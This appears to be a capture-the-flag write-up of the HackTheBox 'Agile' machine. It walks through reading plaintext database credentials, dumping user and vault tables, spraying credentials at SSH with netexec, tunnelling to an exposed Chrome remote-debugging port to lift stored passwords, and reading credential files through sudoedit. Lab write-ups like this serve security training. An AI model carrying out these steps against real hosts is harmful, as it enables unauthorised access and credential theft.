Enumeration

www-data

www-data@agile:/etc/nginx/sites-available$ cat superpass.nginx
cat superpass.nginx
server {
    listen 80;
    listen 127.0.0.1:80;
    server_name superpass.htb;
    proxy_read_timeout 300;
    proxy_connect_timeout 300;
    proxy_send_timeout 300;

    location /static {
        alias /app/app/superpass/static;
        expires 365d;
    }

    location /console {
        rewrite ^/console$ /console0xdf last;
    }

    location / {
        #include uwsgi_params;

        proxy_pass http://127.0.0.1:5000;
        proxy_set_header Host $host;
        proxy_set_header X-Real-IP $remote_addr;
        proxy_set_header X-Forwarded-Protocol $scheme;
    }
}

The directory shows here is /app. Inside /app.

cat test_and_update.sh
#!/bin/bash

# update prod with latest from testing constantly assuming tests are passing

echo "Starting test_and_update"
date

# if already running, exit
ps auxww | grep -v "grep" | grep -q "pytest" && exit

echo "Not already running. Starting..."

# start in dev folder
cd /app/app-testing

# system-wide source doesn't seem to happen in cron jobs
source /app/venv/bin/activate

# run tests, exit if failure
pytest -x 2>&1 >/dev/null || exit

# tests good, update prod (flask debug mode will load it instantly)
cp -r superpass /app/app/
echo "Complete!"

So we have two superpass folders. One in /app/app and the other one in /app/app-testing.

www-data@agile:/app$ cat config_prod.json 
{"SQL_URI": "mysql+pymysql://superpassuser:dSA6l7q*yIVs$39Ml6ywvgK@localhost/superpass"}

venv) www-data@agile:/app/app$ mysql -u superpassuser -p
mysql -u superpassuser -p
Enter password: dSA6l7q*yIVs$39Ml6ywvgK

After connecting to the mysql.

mysql> select * from users;
select * from users;
+----+----------+--------------------------------------------------------------------------------------------------------------------------+
| id | username | hashed_password                                                                                                          |
+----+----------+--------------------------------------------------------------------------------------------------------------------------+
|  1 | 0xdf     | $6$rounds=200000$FRtvqJFfrU7DSyT7$8eGzz8Yk7vTVKudEiFBCL1T7O4bXl0.yJlzN0jp.q0choSIBfMqvxVIjdjzStZUYg6mSRB2Vep0qELyyr0fqF. |
|  2 | corum    | $6$rounds=200000$yRvGjY1MIzQelmMX$9273p66QtJQb9afrbAzugxVFaBhb9lyhp62cirpxJEOfmIlCy/LILzFxsyWj/mZwubzWylr3iaQ13e4zmfFfB1 |
|  9 | admin    | $6$rounds=200000$K5ChYL7zKyR03Wey$C5Y4W0kWOBQfUtHyBG0qQlvrnxQ2Zm4Mq/snh52oiPJ.zXerI6Ij8TI9vHzNqO6lbC9Mg4kdjqvBSUo44hC9W/ |
+----+----------+--------------------------------------------------------------------------------------------------------------------------+
3 rows in set (0.00 sec)

This is the table where registered users are kept.

mysql> select * from users;
+----+----------+--------------------------------------------------------------------------------------------------------------------------+
| id | username | hashed_password                                                                                                          |
+----+----------+--------------------------------------------------------------------------------------------------------------------------+
|  1 | 0xdf     | $6$rounds=200000$FRtvqJFfrU7DSyT7$8eGzz8Yk7vTVKudEiFBCL1T7O4bXl0.yJlzN0jp.q0choSIBfMqvxVIjdjzStZUYg6mSRB2Vep0qELyyr0fqF. |
|  2 | corum    | $6$rounds=200000$yRvGjY1MIzQelmMX$9273p66QtJQb9afrbAzugxVFaBhb9lyhp62cirpxJEOfmIlCy/LILzFxsyWj/mZwubzWylr3iaQ13e4zmfFfB1 |
|  9 | admin    | $6$rounds=200000$K5ChYL7zKyR03Wey$C5Y4W0kWOBQfUtHyBG0qQlvrnxQ2Zm4Mq/snh52oiPJ.zXerI6Ij8TI9vHzNqO6lbC9Mg4kdjqvBSUo44hC9W/ |
| 10 | newuser  | $6$rounds=200000$D/yuhGzE00bv6.a.$efz1vohfhNsqCFWn.NmlWRh9otdhhJYrhHSRtzrex.Ied2jfUEJVJpV6GbWQSKDdkJYt1nfTD1nbuZ0Dab06j0 |
+----+----------+--------------------------------------------------------------------------------------------------------------------------+
4 rows in set (0.00 sec)

0xdf and corum are default.

mysql> select * from passwords;
select * from passwords;
+----+---------------------+---------------------+----------------+----------+----------------------+---------+
| id | created_date        | last_updated_data   | url            | username | password             | user_id |
+----+---------------------+---------------------+----------------+----------+----------------------+---------+
|  3 | 2022-12-02 21:21:32 | 2022-12-02 21:21:32 | hackthebox.com | 0xdf     | 762b430d32eea2f12970 |       1 |
|  4 | 2022-12-02 21:22:55 | 2022-12-02 21:22:55 | mgoblog.com    | 0xdf     | 5b133f7a6a1c180646cb |       1 |
|  6 | 2022-12-02 21:24:44 | 2022-12-02 21:24:44 | mgoblog        | corum    | 47ed1e73c955de230a1d |       2 |
|  7 | 2022-12-02 21:25:15 | 2022-12-02 21:25:15 | ticketmaster   | corum    | 9799588839ed0f98c211 |       2 |
|  8 | 2022-12-02 21:25:27 | 2022-12-02 21:25:27 | agile          | corum    | 5db7caa1d13cc37c9fc2 |       2 |
+----+---------------------+---------------------+----------------+----------+----------------------+---------+
5 rows in set (0.00 sec)

I tried cracking the hashed_passwords but failed.

We see agile as well. With user corum's password. But I took all the username=passwords in different files to run a brute-force. We know the SSH port is open.

netexec ssh 10.10.11.203 -u usernames -p passwords --no-bruteforce
SSH         10.10.11.203    22     10.10.11.203     [*] SSH-2.0-OpenSSH_8.9p1 Ubuntu-3ubuntu0.1
SSH         10.10.11.203    22     10.10.11.203     [-] 0xdf:762b430d32eea2f12970
SSH         10.10.11.203    22     10.10.11.203     [-] 0xdf:5b133f7a6a1c180646cb
SSH         10.10.11.203    22     10.10.11.203     [-] corum:47ed1e73c955de230a1d
SSH         10.10.11.203    22     10.10.11.203     [-] corum:9799588839ed0f98c211
SSH         10.10.11.203    22     10.10.11.203     [+] corum:5db7caa1d13cc37c9fc2  Linux - Shell access!

We get a hit!

ssh - corum

I like how ippsec did it. He first ran ps -ef --forest to see all running processes(ps) and detailed tree view (-ef --forest). Which then shows the following.

runner      1070       1  0 Feb13 ?        00:00:02 /app/venv/bin/python3 /app/venv/bin/gunicorn --bind 127.0.0.1:5555 wsgi-dev:app
runner      1073    1070  0 Feb13 ?        00:00:09  \_ /app/venv/bin/python3 /app/venv/bin/gunicorn --bind 127.0.0.1:5555 wsgi-dev:app
www-data    1071       1  0 Feb13 ?        00:00:02 /app/venv/bin/python3 /app/venv/bin/gunicorn --bind 127.0.0.1:5000 --threads=10 --timeout 600 wsgi:app
www-data    1072    1071  0 Feb13 ?        00:00:06  \_ /app/venv/bin/python3 /app/venv/bin/gunicorn --bind 127.0.0.1:5000 --threads=10 --timeout 600 wsgi:ap

Two python applications on different ports (5000,5555) and different users (www-data,runner) running. And then he went into / to find files with strings 5555 which exposes the /etc/nginx site configuration files, exposing two different files, one is exposed to the internet and the other one is only accessible internally.

They way ippsec did the box its much cleaner imo.

Once in, I digged deeper into the /app-testing directory. I found this interesting file , but we cannot read it.

corum@agile:/app/app-testing/tests/functional$ ls -la
total 20
drwxr-xr-x 3 runner    runner 4096 Feb  7  2023 .
drwxr-xr-x 3 runner    runner 4096 Feb  6  2023 ..
drwxrwxr-x 2 runner    runner 4096 Feb 14 02:33 __pycache__
-rw-r----- 1 dev_admin runner   34 Feb 14 02:39 creds.txt
-rw-r--r-- 1 runner    runner 2663 Feb 14 02:39 test_site_interactively.py
corum@agile:/app/app-testing/tests/functional$ cat creds.txt
cat: creds.txt: Permission denied

corum@agile:/app/app-testing/tests/functional$ grep -irl 'creds.txt'
grep: creds.txt: Permission denied
__pycache__/test_site_interactively.cpython-310-pytest-7.2.0.pyc
test_site_interactively.py

Its been used by test_site_interactively.py.

Selenium is used to test web applications directly on browsers like chrome through Python code. And inside this file we see that, its using the contents of creds.txt which are the usernames and passwords, against the application to see if its working.

corum@agile:/app/app-testing/tests/functional$ cat test_site_interactively.py 
import os
import pytest
import time
from selenium import webdriver
from selenium.webdriver.chrome.options import Options
from selenium.webdriver.common.by import By
from selenium.webdriver.support.ui import WebDriverWait


with open('/app/app-testing/tests/functional/creds.txt', 'r') as f:
    username, password = f.read().strip().split(':')

def driver():
    options = Options()
    #options.add_argument("--no-sandbox")
    options.add_argument("--window-size=1420,1080")
    options.add_argument("--headless")
    options.add_argument("--remote-debugging-port=41829")
    options.add_argument('--disable-gpu')
    options.add_argument('--crash-dumps-dir=/tmp')
    driver = webdriver.Chrome(options=options)
    yield driver
    driver.close()

There is a line here saying --remote-debugging-port=41829. Its a hard-coded port.

And it is open.

corum@agile:~$ ss -lntp | grep 41829
LISTEN 0      10         127.0.0.1:41829      0.0.0.0:*

This site is also alive.

corum@agile:~$ ping test.superpass.htb
PING localhost (127.0.0.1) 56(84) bytes of data.
64 bytes from localhost (127.0.0.1): icmp_seq=1 ttl=64 time=0.027 ms
64 bytes from localhost (127.0.0.1): icmp_seq=2 ttl=64 time=0.052 ms
64 bytes from localhost (127.0.0.1): icmp_seq=3 ttl=64 time=0.069 ms
^C
--- localhost ping statistics ---
3 packets transmitted, 3 received, 0% packet loss, time 2045ms
rtt min/avg/max/mdev = 0.027/0.049/0.069/0.017 ms

We cannot access it from outside. It redirects us back to the default site.

corum@agile:/etc/nginx/sites-enabled$ cat superpass-test.nginx 
server {
    # listen 80 means open to public
    listen 127.0.0.1:80;
    server_name test.superpass.htb;

    location /static {
        alias /app/app-testing/superpass/static;
        expires 365d;
    }
    location / {
        include uwsgi_params;
        proxy_pass http://127.0.0.1:5555;
        proxy_set_header Host $host;
        proxy_set_header X-Real-IP $remote_addr;
        proxy_set_header X-Forwarded-Protocol $scheme;
    }
}

We have to access it from localhost. We can tunnel our localhost to SSH. So we can access port 5555 from our localhost.

corum@agile:/etc/nginx/sites-enabled$ 
ssh> -L 5555:localhost:5555
Forwarding port.

So I registered a new user here. But it doesn;t reflect on the mysql database.

Previously we saw the line --remote-debugging-port=41829. I found an article that explains the attack path. We can abuse that by creating a tunnel between our host and the linux host.

ssh> -L 41829:localhost:41829

Once thats done we can connect it to our chrome debugger by going to chrome://inspect/#devices > configure > add localhost:41829 > done. We should see a new remote device.

When inspecting it and going to vault we find some new credentials.

I can use that to ssh in as edwards:d07867c6267dcb5df0af

ssh - edwards

edwards@agile:~/.config/cni/net.d$ sudo -l
[sudo] password for edwards: 
Matching Defaults entries for edwards on agile:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin, use_pty

User edwards may run the following commands on agile:
    (dev_admin : dev_admin) sudoedit /app/config_test.json
    (dev_admin : dev_admin) sudoedit /app/app-testing/tests/functional/creds.txt

Opening these files gives us two credentials.

superpasstester:VUO8A2c2#3FnLq3*a9DX1U
edwards:1d7ffjwrx#$d6qn!9nndqgde4

Trying them both to get root failed.

But we do know that cred.txt is used by the /app/app-testing/tests/functional/test_site_interactively.py file.

with open('/app/app-testing/tests/functional/creds.txt', 'r') as f:
    username, password = f.read().strip().split(':')

PreviousFoothold NextPrivEsc

Last updated 10 months ago